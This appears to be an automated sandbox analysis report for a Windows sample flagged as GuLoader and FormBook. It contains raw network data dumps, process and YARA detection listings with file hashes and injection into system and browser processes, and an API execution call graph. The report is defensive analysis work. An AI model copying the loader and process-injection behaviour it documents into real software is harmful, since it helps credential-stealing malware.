                                                                                                                                                                                                Data Ascii: b%`mJyeWY5IULPYP8@;R?O$<fbsb&x%JnLM?)/jyCs^&7yU,r>y\V&G]]WMr6Iy1A/8*W0)fZ9KRaMa>t4F;R?,.s+V^o
                                                                                                                                                                                                2023-11-17 18:25:36 UTC241INData Raw: 69 92 d4 34 c8 30 52 45 d5 8b d9 45 17 9b d6 0e 9b ff b8 ca dd f2 a5 81 70 07 b6 3d 49 a8 ed 24 c9 d8 f7 79 8b 49 73 fc 1a 3b 52 f3 d9 a7 5d 62 c9 54 7c 27 2b 78 e6 97 6c 7b 56 7c 50 23 a8 1f 42 1b 9c 42 92 c5 43 d5 80 94 86 73 48 e1 aa c3 54 01 02 3a 91 be 27 2f 11 0a 22 b8 b6 cb 35 52 d1 14 bf c7 d9 ff 8e fc 43 88 d6 0d
                                                                                                                                                                                                Data Ascii: i40REEp=I$yIs;R]bT|'+xl{V|P#BBCsHT:'/"5RC
                                                                                                                                                                                                2023-11-17 18:25:36 UTC242INData Raw: a5 fd f5 73 c8 0f c2 37 5a d4 8c 7d 2e ae 14 04 02 08 99 9f e9 c2 38 62 52 5f 22 b8 24 b5 c9 5b b3 f5 42 1a 09 3a 37 07 0a ef a0 42 88 e8 93 b4 fc 1d 7a 55 1e fd d1 8a 5f 16 d8 21 3f e8 68 e2 dd 89 0f 3c 4b b0 4a c3 95 ad 44 9e 56 b8 14 8e 29 a8 1b 6f 46 e8 3a b2 bb b6 24 dc 25 db 52 f2 fa 1d 72 e3 22 2c 1f 49 6b 75 b4 aa 9b 33 df 68 a5 88 cb 5d 4c aa 73 81 d7 3b b8 b5 3c f0 dd e0 df 3b e1 a7 45 23 96 3d 17 26 9c 88 79 4f 0e 46 cf 6f d8 62 c8 7c 9e 25 10 23 1f 62 d5 a0 1d 40 42 fa f6 a6 50 74 a6 8c 95 c0 79 76 9d 3a 31 c9 fa 29 9b 09 73 90 a1 c7 a2 5b 28 43 65 14 f2 62 04 79 e3 9f 37 a7 34 58 ca cb 7f 02 90 ee 6e 05 e4 c3 38 8c df b9 22 07 9d e2 4f a8 d8 2e 8a 98 04 fd c4 d4 44 30 fa e2 45 48 c7 19 15 89 52 cd 50 3a 61 5f 66 96 84 d6 10 38 52 4a ae 76 74
                                                                                                                                                                                                Data Ascii: s7Z}.8bR_"$[B:7BzU_!?h<KJDV)oF:$%Rr",Iku3h]Ls;<;E#=&yOFob|%#b@BPtyv:1)s[(Ceby74Xn8"O.D0EHRP:a_f8RJvt
                                                                                                                                                                                                2023-11-17 18:25:36 UTC243INData Raw: e3 3c 6a 74 82 13 69 e8 bc fb 6f 8d 78 8d b0 80 eb cd ac 9a d3 df 28 ff 20 48 75 6d f0 a3 50 29 af 6f 0a 52 06 52 b9 33 2f c4 f5 f6 71 24 0e 02 2d f6 18 11 75 f3 a5 33 26 44 48 70 5e 8b 00 62 36 60 28 bd 53 da 3b f8 c0 e5 06 0c d3 f6 d1 a1 f9 59 f6 29 cf 62 34 67 42 2d 4b c2 17 ad 8e e3 11 69 3d 9c 93 a2 c9 07 55 f2 59 e6 81 18 e2 b8 e6 a0 fa 64 0c 3c 56 9a 9c 82 91 f4 e1 5d 12 d7 1b d5 5d 83 7c 91 65 a4 38 ff 5b d6 df 42 64 7b f1 bb 50 bc bf 7a 6e a2 07 bc cd 01 0f 51 b1 84 e3 e9 e7 fc ec 07 b1 49 0d 49 41 50 73 48 89 de 98 38 07 3a 50 96 4d ba f8 1d da e8 71 26 42 ef f3 16 8e 3d b0 c2 9c 8b 5a 77 5c 89 55 50 33 01 47 2d 42 62 68 0d f9 ec e5 49 6c cc 6d df 8f e5 a7 af c6 24 6e f7 dc b9 60 0d 51 60 7a f8 a5 8e e5 e5 3f 66 76 4d 6e c5 c9 ac 94 42 c3 fa 9f
                                                                                                                                                                                                Data Ascii: <jtiox( HumP)oRR3/q$-u3&DHp^b6`(S;Y)b4gB-Ki=UYd<V]]|e8[Bd{PznQIIAPsH8:PMq&B=Zw\UP3G-BbhIlm$n`Q`z?fvMnB
                                                                                                                                                                                                2023-11-17 18:25:36 UTC244INData Raw: 21 84 20 b0 4f dc 37 14 36 78 5b 4a ef 18 fa cb ab ac 3d 84 ad 63 38 be ca ed a5 ef 4e a6 62 b7 ca 8a 1a 9f 28 dd e7 9e ef 7d 21 f4 1c d2 6e d5 bf ea b6 d3 12 3b 6a 4f 75 14 1c b4 eb c4 04 d0 79 20 0d 19 43 1c 78 e1 bb aa 06 9d 3f e1 16 42 8d e8 b2 6b a0 04 85 2b d0 57 0b 81 43 f2 c2 11 25 9f 7d 53 57 0b 87 58 02 b0 37 36 ff 51 49 94 ba ae 50 3e da 79 f2 c5 13 5e 1e f7 81 6c 72 fc c7 3c 49 80 63 79 48 63 dc a4 db 89 f5 e4 e7 18 0b 15 88 4e 03 3e c8 5d 06 47 2e a6 d9 93 39 93 66 10 66 30 e9 16 b7 f0 7d 9b 89 8d 08 a8 6b da fc 4e eb fa d0 d3 4e 1a e9 e0 73 bc 52 06 37 b5 8e 3b 1d b5 40 8f 7d 20 48 ff 8b 39 d5 0e 16 69 0b b4 35 4e 4b de ae 63 c4 86 2b f7 a2 23 48 b1 87 27 c7 48 03 b4 23 ac a3 f9 e0 81 41 67 ed 6c 52 6c 58 5d d8 80 49 15 a6 11 4e cf 74 7c 47
                                                                                                                                                                                                Data Ascii: ! O76x[J=c8Nb(}!n;jOuy Cx?Bk+WC%}SWX76QIP>y^lr<IcyHcN>]G.9ff0}kNNsR7;@} H9i5NKc+#H'H#AglRlX]INt|G
                                                                                                                                                                                                2023-11-17 18:25:36 UTC245INData Raw: 87 37 3b 1b fd ec d1 8e c1 04 d6 97 ac ef ac c1 a4 85 d3 4b fc e5 77 2a c7 13 66 80 db 2b c4 ae fd 09 db d9 f8 41 61 2b a9 a4 8e c6 52 9a 43 11 f6 be f4 ed cf 9b 94 a7 6e 6e 60 d2 9e a5 d6 a1 e4 bf 85 cc 65 fe 1f 47 4f 8f 40 6d f1 95 84 2f 54 78 e4 07 d1 d2 0b 7d 3b 88 38 da ce 3a 73 8b 2c d5 32 84 a2 05 1d 7a f9 f4 2c 2a a6 48 34 ae 66 22 c9 ee 05 f3 da 12 0e c3 79 c4 c6 d9 da 8b cc 38 39 2c df 44 a3 ea 35 29 ec 5a 33 a9 e0 b2 18 ab 3f 68 0e 11 8d 6e 3c 4e fc 94 e3 b6 e6 6a fe c5 f2 89 64 9e 72 11 a0 5d d8 0e 6d f4 18 94 a3 07 b3 ba bb e0 bf 1d 36 fc c3 2e 66 6e a9 a8 d4 c8 fb 47 34 5b db 00 5c 45 48 7e 08 1f 65 7e 70 dc 30 45 78 35 9b 3a 33 91 c3 40 83 64 f7 5f 30 fe ec 70 10 74 44 cc a3 73 44 ac 75 9c bd 05 1f 56 54 b6 12 5f c0 34 ca ef 30 34 58 09 f6
                                                                                                                                                                                                Data Ascii: 7;Kw*f+Aa+RCnn`eGO@m/Tx};8:s,2z,*H4f"y89,D5)Z3?hn<Njdr]m6.fnG4[\EH~e~p0Ex5:3@d_0ptDsDuVT_404X
                                                                                                                                                                                                2023-11-17 18:25:36 UTC246INData Raw: 3c 98 1f 32 cf fe 1a d6 d2 c6 ac e4 06 b4 22 28 0b f1 1c c8 bf 41 ff 3f 34 b4 e0 3d 20 f1 02 ac 9e 8d dc ad 09 14 5c f1 20 02 29 ed 71 7a 5f bd c8 a2 e0 69 8e 35 8c 4f fc a7 8c 4f d6 c9 d0 7e 8b 60 26 fb ed a1 20 e4 78 f9 3f 04 2e 98 fa 4d 4f 74 7a d7 56 89 65 9c 61 4d db c7 7a dc 94 6a 6f b5 de 3b bb eb b4 b8 ea 1d 6f 0b da a4 51 3c 76 23 2e 6a 52 6b 55 69 5a 3a 7e be 52 c5 5d e6 cb e8 f2 d5 2d b2 11 51 9b 3c a8 7b 94 2b 19 85 b2 5e 4c 21 e9 bb 71 4d 0f 42 cb a4 25 0d b5 ca 29 36 e9 d6 dd 7c 2a a3 3a 38 49 98 fc 8a ae 04 68 ba ce 89 e5 a0 86 a4 38 27 4a 39 05 cf 5a be e0 08 e8 42 22 1d 83 4b c2 4f 21 4f 98 dc 13 62 55 02 fe 23 75 12 c4 98 fe 4d af 28 2c 9b 58 65 b2 88 55 d3 84 23 37 66 c2 c4 b5 a6 6a da 17 37 c0 72 cd f5 49 de 10 c9 32 f7 87 ed 76 28 0f
                                                                                                                                                                                                Data Ascii: <2"(A?4= \ )qz_i5OO~`& x?.MOtzVeaMzjo;oQ<v#.jRkUiZ:~R]-Q<{+^L!qMB%)6|*:8Ih8'J9ZB"KO!ObU#uM(,XeU#7fj7rI2v(
                                                                                                                                                                                                2023-11-17 18:25:36 UTC248INData Raw: 5b fb 62 f5 76 05 7f 6b dc d0 53 84 54 b0 f2 7e 16 24 92 fc 8c 79 a1 de 01 ab b8 9c 31 15 aa 1e 36 e5 57 ef 6a a3 91 d6 cb c5 a4 d5 ad c0 1d a0 ab 13 94 c6 04 60 f1 d0 da 8e 5b 39 2c 40 8e f5 2f da 9d 27 f6 c1 89 91 ad 3b 32 22 b4 6a 70 ca 12 c8 0c a6 1e c3 7a ac 1b f1 2e e0 8f 39 24 0a ea 0a f6 76 e8 2b 09 af f4 74 7b 35 44 38 7e 39 dc 76 d5 64 ec 90 f0 bf 4e 1d ea a1 24 7d d9 5d 04 1e 3f 03 86 02 d6 18 d5 68 06 5d 29 a1 ca e5 ce a4 bb b3 6e 34 1d 19 c6 c5 ee 0d 92 c0 83 2d 95 38 2f 04 07 e6 95 88 d6 33 5f da 80 36 21 27 a7 ef 90 d3 05 c8 a6 43 9e a9 90 95 1a 53 53 f2 13 49 ed 43 8e b3 9c c2 1f 79 c4 dc cd 1b 48 c0 54 97 67 5e 08 64 48 b3 cc b4 3a 78 df 6d d2 bf 8b ba 0f 2e cb 12 d2 16 bf 53 f4 e8 de 09 56 39 0c 7f a0 41 0b 43 89 74 90 57 a6 83 37 b5 23
                                                                                                                                                                                                Data Ascii: [bvkST~$y16Wj`[9,@/';2"jpz.9$v+t{5D8~9vdN$}]?h])n4-8/3_6!'CSSICyHTg^dH:xm.SV9ACtW7#
                                                                                                                                                                                                2023-11-17 18:25:36 UTC249INData Raw: dd 7a fa 9b 69 82 be db 74 ff ff d1 06 8c e1 f8 5c 8e bc 55 3b 71 73 03 e8 fb 8d a4 42 a5 bc 55 e0 b7 8e 97 0d 4d a0 ff a7 10 1c 8a 49 99 67 3a 65 c1 75 82 41 74 9d 49 d0 81 5e 78 2e 69 b5 80 a3 ad 91 b6 ff 82 e8 2c 45 a4 df dc a4 a0 fd ef 06 8c 94 34 8f 64 a0 1b 17 2e 6c c3 7e 05 80 4b aa a0 34 f3 f3 a1 51 b9 14 9e 11 3e b3 3c b8 78 8f 1a 97 d0 c3 52 fd 33 10 b4 2c 18 26 74 d6 46 fb 03 f2 7c 04 a4 45 5a 26 b3 11 1a f9 a4 d8 4e d8 58 f6 f2 7f ff a7 1c 2c 03 d4 e0 83 fe 1a 6a a3 8e f6 c5 81 f9 89 92 ac 10 bc 69 60 5a 1a ea 59 ef 20 02 ff cd 4b a6 c6 0a c5 0a dd a4 1b d6 cc 78 12 a0 e1 4d 2c 58 4a a0 7b 4e ef 29 f9 f8 8e 22 ce c6 fa ca 5e 6e 46 34 7c 15 0d c3 3d 5f a1 1c 4c 54 28 d8 31 33 62 a9 ed 58 5f c7 4d 00 0a 6b ae ab 4d 08 5f 5d fc 23 6d 0f 3c 8e ac
                                                                                                                                                                                                Data Ascii: zit\U;qsBUMIg:euAtI^x.i,E4d.l~K4Q><xR3,&tF|EZ&NX,ji`ZY KxM,XJ{N)"^nF4|=_LT(13bX_MkM_]#m<
                                                                                                                                                                                                2023-11-17 18:25:36 UTC250INData Raw: ab 73 f6 85 d6 4a d7 6d 18 7e b0 2c 8a 16 9c 2c b7 6f e5 bb 85 65 fc ea 85 b3 97 e6 15 21 a9 70 58 0e c1 a2 52 fe 7f 8b 0c 3f 18 48 80 e7 1d bc a5 5f 68 a9 8d 45 91 69 c0 f2 31 ab 14 33 ec
                                                                                                                                                                                                Data Ascii: sJm~,,oe!pXR?H_hEi13


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:19:25:08
                                                                                                                                                                                                Start date:17/11/2023
                                                                                                                                                                                                Path:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:388'080 bytes
                                                                                                                                                                                                MD5 hash:01E7D9FDC578B010AC4742A69874B8C9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.11924794479.0000000000528000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.11926685179.00000000048AB000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:2
                                                                                                                                                                                                Start time:19:25:24
                                                                                                                                                                                                Start date:17/11/2023
                                                                                                                                                                                                Path:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Users\user\Desktop\U6SJBLxT2Z.exe
                                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                                File size:388'080 bytes
                                                                                                                                                                                                MD5 hash:01E7D9FDC578B010AC4742A69874B8C9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.12033634200.0000000032530000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.12034799323.00000000335B0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:19:25:36
                                                                                                                                                                                                Start date:17/11/2023
                                                                                                                                                                                                Path:C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe"
                                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.16761692315.0000000003480000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:19:25:38
                                                                                                                                                                                                Start date:17/11/2023
                                                                                                                                                                                                Path:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:C:\Windows\SysWOW64\extrac32.exe
                                                                                                                                                                                                Imagebase:0xa10000
                                                                                                                                                                                                File size:29'184 bytes
                                                                                                                                                                                                MD5 hash:9472AAB6390E4F1431BAA912FCFF9707
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.16758650959.00000000030B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.16761189587.0000000003510000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.16761377497.0000000003550000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:19:25:50
                                                                                                                                                                                                Start date:17/11/2023
                                                                                                                                                                                                Path:C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe
                                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                                Commandline:"C:\Program Files (x86)\bdzDGTMMusXcEiMplCvKoElCHYVZWeSjQVqxAIdFwfubCvNARJRHLelYDoOHj\RvEFtjZJSPYTXuqJXJdvrvwe.exe"
                                                                                                                                                                                                Imagebase:0x90000
                                                                                                                                                                                                File size:140'800 bytes
                                                                                                                                                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Yara matches:
                                                                                                                                                                                                • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.16760933797.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:19:26:03
                                                                                                                                                                                                Start date:17/11/2023
                                                                                                                                                                                                Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Program Files\Mozilla Firefox\Firefox.exe
                                                                                                                                                                                                Imagebase:0x7ff716520000
                                                                                                                                                                                                File size:597'432 bytes
                                                                                                                                                                                                MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                                                                                                                                Has elevated privileges:false
                                                                                                                                                                                                Has administrator privileges:false
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Reset < >

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:19.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                  Signature Coverage:16.5%
                                                                                                                                                                                                  Total number of Nodes:1567
                                                                                                                                                                                                  Total number of Limit Nodes:34
                                                                                                                                                                                                  execution_graph 3901 401941 3902 401943 3901->3902 3907 402d3e 3902->3907 3908 402d4a 3907->3908 3953 40644e 3908->3953 3911 401948 3913 405b23 3911->3913 3995 405dee 3913->3995 3916 405b62 3918 405c8d 3916->3918 4009 406411 lstrcpynW 3916->4009 3917 405b4b DeleteFileW 3923 401951 3917->3923 3918->3923 4038 40676f FindFirstFileW 3918->4038 3920 405b88 3921 405b9b 3920->3921 3922 405b8e lstrcatW 3920->3922 4010 405d32 lstrlenW 3921->4010 3924 405ba1 3922->3924 3927 405bb1 lstrcatW 3924->3927 3928 405ba7 3924->3928 3930 405bbc lstrlenW FindFirstFileW 3927->3930 3928->3927 3928->3930 3932 405c82 3930->3932 3951 405bde 3930->3951 3931 405cab 4041 405ce6 lstrlenW CharPrevW 3931->4041 3932->3918 3936 405c65 FindNextFileW 3939 405c7b FindClose 3936->3939 3936->3951 3937 405adb 5 API calls 3938 405cbd 3937->3938 3940 405cc1 3938->3940 3941 405cd7 3938->3941 3939->3932 3940->3923 3944 405479 24 API calls 3940->3944 3943 405479 24 API calls 3941->3943 3943->3923 3946 405cce 3944->3946 3945 405b23 60 API calls 3945->3951 3948 4061d7 36 API calls 3946->3948 3947 405479 24 API calls 3947->3936 3949 405cd5 3948->3949 3949->3923 3951->3936 3951->3945 3951->3947 4014 406411 lstrcpynW 3951->4014 4015 405adb 3951->4015 4023 405479 3951->4023 4034 4061d7 MoveFileExW 3951->4034 3968 40645b 3953->3968 3954 4066a6 3955 402d6b 3954->3955 3986 406411 lstrcpynW 3954->3986 3955->3911 3970 4066c0 3955->3970 3957 406674 lstrlenW 3957->3968 3960 40644e 10 API calls 3960->3957 3962 406589 GetSystemDirectoryW 3962->3968 3963 40659c GetWindowsDirectoryW 3963->3968 3964 4066c0 5 API calls 3964->3968 3965 4065d0 SHGetSpecialFolderLocation 3965->3968 3969 4065e8 SHGetPathFromIDListW CoTaskMemFree 3965->3969 3966 40644e 10 API calls 3966->3968 3967 406617 lstrcatW 3967->3968 3968->3954 3968->3957 3968->3960 3968->3962 3968->3963 3968->3964 3968->3965 3968->3966 3968->3967 3979 4062df 3968->3979 3984 406358 wsprintfW 3968->3984 3985 406411 lstrcpynW 3968->3985 3969->3968 3971 4066cd 3970->3971 3973 406736 CharNextW 3971->3973 3975 406743 3971->3975 3977 406722 CharNextW 3971->3977 3978 406731 CharNextW 3971->3978 3991 405d13 3971->3991 3972 406748 CharPrevW 3972->3975 3973->3971 3973->3975 3975->3972 3976 406769 3975->3976 3976->3911 3977->3971 3978->3973 3987 40627e 3979->3987 3982 406313 RegQueryValueExW RegCloseKey 3983 406343 3982->3983 3983->3968 3984->3968 3985->3968 3986->3955 3988 40628d 3987->3988 3989 406291 3988->3989 3990 406296 RegOpenKeyExW 3988->3990 3989->3982 3989->3983 3990->3989 3992 405d19 3991->3992 3993 405d2f 3992->3993 3994 405d20 CharNextW 3992->3994 3993->3971 3994->3992 4044 406411 lstrcpynW 3995->4044 3997 405dff 4045 405d91 CharNextW CharNextW 3997->4045 4000 405b43 4000->3916 4000->3917 4001 4066c0 5 API calls 4006 405e15 4001->4006 4002 405e46 lstrlenW 4003 405e51 4002->4003 4002->4006 4005 405ce6 3 API calls 4003->4005 4004 40676f 2 API calls 4004->4006 4007 405e56 GetFileAttributesW 4005->4007 4006->4000 4006->4002 4006->4004 4008 405d32 2 API calls 4006->4008 4007->4000 4008->4002 4009->3920 4011 405d40 4010->4011 4012 405d52 4011->4012 4013 405d46 CharPrevW 4011->4013 4012->3924 4013->4011 4013->4012 4014->3951 4051 405ee2 GetFileAttributesW 4015->4051 4018 405b08 4018->3951 4019 405af6 RemoveDirectoryW 4021 405b04 4019->4021 4020 405afe DeleteFileW 4020->4021 4021->4018 4022 405b14 SetFileAttributesW 4021->4022 4022->4018 4024 405494 4023->4024 4033 405536 4023->4033 4025 4054b0 lstrlenW 4024->4025 4026 40644e 17 API calls 4024->4026 4027 4054d9 4025->4027 4028 4054be lstrlenW 4025->4028 4026->4025 4030 4054ec 4027->4030 4031 4054df SetWindowTextW 4027->4031 4029 4054d0 lstrcatW 4028->4029 4028->4033 4029->4027 4032 4054f2 SendMessageW SendMessageW SendMessageW 4030->4032 4030->4033 4031->4030 4032->4033 4033->3951 4035 4061f8 4034->4035 4036 4061eb 4034->4036 4035->3951 4054 40605d 4036->4054 4039 406785 FindClose 4038->4039 4040 405ca7 4038->4040 4039->4040 4040->3923 4040->3931 4042 405d02 lstrcatW 4041->4042 4043 405cb1 4041->4043 4042->4043 4043->3937 4044->3997 4046 405dae 4045->4046 4050 405dc0 4045->4050 4048 405dbb CharNextW 4046->4048 4046->4050 4047 405de4 4047->4000 4047->4001 4048->4047 4049 405d13 CharNextW 4049->4050 4050->4047 4050->4049 4052 405ae7 4051->4052 4053 405ef4 SetFileAttributesW 4051->4053 4052->4018 4052->4019 4052->4020 4053->4052 4055 4060b3 GetShortPathNameW 4054->4055 4056 40608d 4054->4056 4057 4061d2 4055->4057 4058 4060c8 4055->4058 4081 405f07 GetFileAttributesW CreateFileW 4056->4081 4057->4035 4058->4057 4060 4060d0 wsprintfA 4058->4060 4062 40644e 17 API calls 4060->4062 4061 406097 CloseHandle GetShortPathNameW 4061->4057 4063 4060ab 4061->4063 4064 4060f8 4062->4064 4063->4055 4063->4057 4082 405f07 GetFileAttributesW CreateFileW 4064->4082 4066 406105 4066->4057 4067 406114 GetFileSize GlobalAlloc 4066->4067 4068 406136 4067->4068 4069 4061cb CloseHandle 4067->4069 4083 405f8a ReadFile 4068->4083 4069->4057 4074 406155 lstrcpyA 4077 406177 4074->4077 4075 406169 4076 405e6c 4 API calls 4075->4076 4076->4077 4078 4061ae SetFilePointer 4077->4078 4090 405fb9 WriteFile 4078->4090 4081->4061 4082->4066 4084 405fa8 4083->4084 4084->4069 4085 405e6c lstrlenA 4084->4085 4086 405ead lstrlenA 4085->4086 4087 405eb5 4086->4087 4088 405e86 lstrcmpiA 4086->4088 4087->4074 4087->4075 4088->4087 4089 405ea4 CharNextA 4088->4089 4089->4086 4091 405fd7 GlobalFree 4090->4091 4091->4069 4092 4015c1 4093 402d3e 17 API calls 4092->4093 4094 4015c8 4093->4094 4095 405d91 4 API calls 4094->4095 4100 4015d1 4095->4100 4096 401631 4097 401663 4096->4097 4098 401636 4096->4098 4103 401423 24 API calls 4097->4103 4119 401423 4098->4119 4099 405d13 CharNextW 4099->4100 4100->4096 4100->4099 4109 401617 GetFileAttributesW 4100->4109 4111 4059e2 4100->4111 4114 405948 CreateDirectoryW 4100->4114 4123 4059c5 CreateDirectoryW 4100->4123 4108 40165b 4103->4108 4107 40164a SetCurrentDirectoryW 4107->4108 4109->4100 4126 406806 GetModuleHandleA 4111->4126 4115 405995 4114->4115 4116 405999 GetLastError 4114->4116 4115->4100 4116->4115 4117 4059a8 SetFileSecurityW 4116->4117 4117->4115 4118 4059be GetLastError 4117->4118 4118->4115 4120 405479 24 API calls 4119->4120 4121 401431 4120->4121 4122 406411 lstrcpynW 4121->4122 4122->4107 4124 4059d5 4123->4124 4125 4059d9 GetLastError 4123->4125 4124->4100 4125->4124 4127 406822 4126->4127 4128 40682c GetProcAddress 4126->4128 4132 406796 GetSystemDirectoryW 4127->4132 4130 4059e9 4128->4130 4130->4100 4131 406828 4131->4128 4131->4130 4134 4067b8 wsprintfW LoadLibraryExW 4132->4134 4134->4131 4897 401c43 4898 402d1c 17 API calls 4897->4898 4899 401c4a 4898->4899 4900 402d1c 17 API calls 4899->4900 4901 401c57 4900->4901 4902 401c6c 4901->4902 4903 402d3e 17 API calls 4901->4903 4904 401c7c 4902->4904 4905 402d3e 17 API calls 4902->4905 4903->4902 4906 401cd3 4904->4906 4907 401c87 4904->4907 4905->4904 4908 402d3e 17 API calls 4906->4908 4909 402d1c 17 API calls 4907->4909 4911 401cd8 4908->4911 4910 401c8c 4909->4910 4912 402d1c 17 API calls 4910->4912 4913 402d3e 17 API calls 4911->4913 4914 401c98 4912->4914 4915 401ce1 FindWindowExW 4913->4915 4916 401cc3 SendMessageW 4914->4916 4917 401ca5 SendMessageTimeoutW 4914->4917 4918 401d03 4915->4918 4916->4918 4917->4918 4919 402b43 4920 406806 5 API calls 4919->4920 4921 402b4a 4920->4921 4922 402d3e 17 API calls 4921->4922 4923 402b53 4922->4923 4924 402b57 IIDFromString 4923->4924 4926 402b8e 4923->4926 4925 402b66 4924->4925 4924->4926 4925->4926 4929 406411 lstrcpynW 4925->4929 4928 402b83 CoTaskMemFree 4928->4926 4929->4928 4167 4034c5 SetErrorMode GetVersion 4168 403504 4167->4168 4169 40350a 4167->4169 4170 406806 5 API calls 4168->4170 4171 406796 3 API calls 4169->4171 4170->4169 4172 403520 lstrlenA 4171->4172 4172->4169 